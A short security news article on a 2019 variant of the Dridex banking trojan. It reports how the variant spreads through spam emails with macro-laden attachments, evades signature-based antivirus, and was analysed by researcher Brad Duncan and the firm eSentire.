The new version of the Dridex banker slipping from antiviruses

Information security professionals were aware about Dridex banking trojan since 2014 and it is still one of the most sophisticated malware in its category.

Development of this malware continues to this day: new versions of the Trojan appear regularly, with periodical release of large updates.

In early June 2019, independent security expert Brad Duncan discovered a new version of Dridex, which used Application Whitelisting to block or disable Windows Script Host elements. In fact, this means that the abuse of WMI (WMIC) allows Malvare to use XLS scripts and bypass the defense mechanisms.

“Of note, the Dridex DLL files are 64-bit DLLs using file names that are loaded by legitimate Microsoft Windows system EXEs. These file paths, file names, and associated SHA256 hashes change every time the victim logs onto the infected Windows host”, — reported Brad Duncan.

Now a more detailed report on the new version of the Trojan was released by experts of the company eSentire. Researchers write that initially, when a sample was loaded onto VirusTotal, only 6 out of 60 protective solutions “detected” malware in Dridex. As of July 2, 2019, the number of detections increased to 46 out of 60.

Analysts at eSentire write that a new variation of Dridex is distributed through spam emails with malicious attachments. These documents contain malicious macros, which can be triggered by various interactions with the victim (it all depends on the specific system environment).

“The malware targets banking information on the victim system. Over the last decade, Dridex underwent a series of feature augmentation, including a transition to XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption”, — reported eSentire specialists.

Experts warn that many antivirus solutions may detect suspicious behavior of Dridex, but will not be able accurately determine the problem. Given the constant changes that occur in the Trojan infrastructure, signature-based antivirus software may be useless against Dridex.